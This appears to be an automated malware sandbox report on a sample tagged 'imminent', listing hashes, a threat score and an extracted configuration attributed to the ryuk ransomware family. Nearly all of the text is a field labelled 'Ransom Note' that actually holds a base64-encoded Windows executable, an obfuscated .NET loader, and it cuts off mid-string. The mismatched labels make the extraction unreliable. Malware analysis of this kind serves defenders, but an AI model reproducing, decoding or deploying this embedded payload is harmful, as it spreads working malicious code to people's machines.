imminent | ce77093b54c13fbcfc399fdb3b61f13f9ab463a38f87428cf9239c53fc6c2017

General

Target

ce77093b54c13fbcfc399fdb3b61f13f9ab463a38f87428cf9239c53fc6c2017
Size

32.2MB
Sample

220122-av9wmsfab6
MD5

5aab976003bd9fd656efa03cdbb9c3da
SHA1

8535ea53061cfb86467c0dfc4cb9afc56ba9a828
SHA256

ce77093b54c13fbcfc399fdb3b61f13f9ab463a38f87428cf9239c53fc6c2017
SHA512

b7660b61302c06bca58b4b003d5af13c7bffab3278c5918c2968ba8982c541446f33187579a90ec764d67c4018576467b560df6b9ebe59589a41b40463d85265

Score

10^/10

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\WdiService\сфБщДтĐѨКК.txt

Family

ryuk

Ransom Note

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAEhUcVkAAAAAAAAAAOAAAgELAQgAAJADAgAgAAAAAAAA1qQDAgAgAAAAwAMCAABAAAAgAAAAEAAABAAAAAAAAAAEAAAAAAAAAAAABAIAEAAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAIykAwJKAAAAAMADAlQJAAAAAAAAAAAAAAAAAAAAAAAAAOADAgwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA3IQDAgAgAAAAkAMCABAAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAFQJAAAAwAMCABAAAACgAwIAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAOADAgAQAAAAsAMCAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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eUF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAFN1cHByZXNzSWxkYXNtQXR0cmlidXRlAE1pY3Jvc29mdC5WaXN1YWxCYXNpYwBTdGFuZGFyZE1vZHVsZUF0dHJpYnV0ZQBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQ29tcGlsZXJTZXJ2aWNlcwBTVEFUaHJlYWRBdHRyaWJ1dGUAMy5SZXNvdXJjZXMAU3RyaW5nAEVtcHR5AGdldF9MZW5ndGgAU3RyaW5ncwBNaWQAQ29uY2F0AERhdGVUaW1lAGdldF9ZZWFyAGdldF9Nb250aABBZGREYXlzAGdldF9EYXlPZldlZWsARGF5T2ZXZWVrAE5ld0xhdGVCaW5kaW5nAExhdGVDYWxsAFR5cGUAR2V0VHlwZUZyb21IYW5kbGUAUnVudGltZVR5cGVIYW5kbGUAZ2V0X0Fzc2VtYmx5AFJlc291cmNlTWFuYWdlcgBTeXN0ZW0uUmVzb3VyY2VzAEVuY29kaW5nAFN5c3RlbS5UZXh0AGdldF9EZWZhdWx0AEdldEJ5dGVzAExhdGVHZXQAUnVudGltZUhlbHBlcnMAR2V0T2JqZWN0VmFsdWUAAAAAA2EAAA1JAG4AdgBvAGsAZQAAAzMAAFtmAHcAbwBvAG4AZQBrAGQAcwBtAHcAZgBnAHIAbwByAG4AagB5AGUAaABwAG8AbgBkAG8AeQB4AHEAYQB3AGEAaQB5AHQAbgBiAHgAbwBoAGcAcABzAHgAbgAAFUUAbgB0AHIAeQBwAG8AaQBuAHQAABNHAGUAdABPAGIAagBlAGMAdAAAAzcAAAlMAG8AYQBkAAAAh8s5I5r7l0OuHnCDS6/7RwAIt3pcVhk04IkDIAABBQABARINBAABHBwDAAAcBQABHBIRAwAAAQQgAQEOBQEAAAAABCABAQgIAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBDAEABzEuMC4wLjAAACcBACJQb3dlcmVkIGJ5IFNtYXJ0QXNzZW1ibHkgNi45LjAuMTE0AAAEAQAAAAiwP19/EdUKOgIGDgMgAAgGAAMODggIBQACDg4OBiADAQgICAUgARFNDQQgABFRAh0cEQAIHBwSWQ4dHB0OHRJZHQICEgcLCAgRUQgRTQgRTQ4OCB0dHAYAARJZEV0EIAASEQYgAgEOEhERBwwICBwRUQgRTQgRTQ4OCA4EAAASZQUgAR0FDgIdBRUHDggIHBFRCBFNCBFNDg4IHQUdBQgQAAccHBJZDh0cHQ4dElkdAhAHCwgIHBFRCBFNCBFNDg4IFAcOHAgIHBwRUQgRTQgRTQ4OCB0cEwcNCBwcCBFRCBFNCBFNDg4IHRzIcAMCzsrvvgEAAACRAAAAbFN5c3RlbS5SZXNvdXJjZXMuUmVzb3VyY2VSZWFkZXIsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNldAIAAAABAAAAAAAAAFBBRFBBRFCStQIAAAAAAMMAAAACNwAAAAAAIABwAwJDndYfBw0TX0lqr/C3q3dh1FsmJTnpUkLuQHpdOSAwSXFHJhtMVTwuJn5nLAIqlLGvvbq2soiUsqO9DpgYqYDImABgT93wKFcBk+qO048MIMy2G3NRPjo77q7/ITwUV++c//S9CWvkjfL9n5nGg3HJBATLRsug0tLHsoyLlb/lTEL/xwnXnjLR5AOu8rq2soiUsoN9kKerubeqtPEl47/X0L6BtairsOgo7aTXydKkE1PgnrT6FPHP/dq2ooiEtquxjpiYqYKtrLWmqbyxkJ4h9ESmpIy7lb+1ibyk8ZXeHIK6pIGPjbq2ooiEgoONjpiYqbKpvLGmqbyxkJ6BtUBO2cH7KfC1iRJnHSWmIbS6lLGvvbq2soiUsqO9jpiYqQKoMoKYpbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6B1ejLuryDlb+1ibKks5CGqdLCtPk/5bq2soiUsqO9jrJQDjZaxOWmncweqJmj9cir8g3NqrG1ubKks5CGkbK6lLGvvdr20uh20CZ9PrIHqTKXALOmCXsTnYyhpajbE9iUk7+1ibKks5CGkbL6FPHvV7wHMDArxQKBjqyYqQKoMraIiYyx8FvnsKqrsoyLlb+1ibKk8xDG0zb8lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLlb+1ibKks5CGkbK6lLGvvbq2soiUsqO9jpiYqYKprLGmqbyxkJ6BtairsoyLl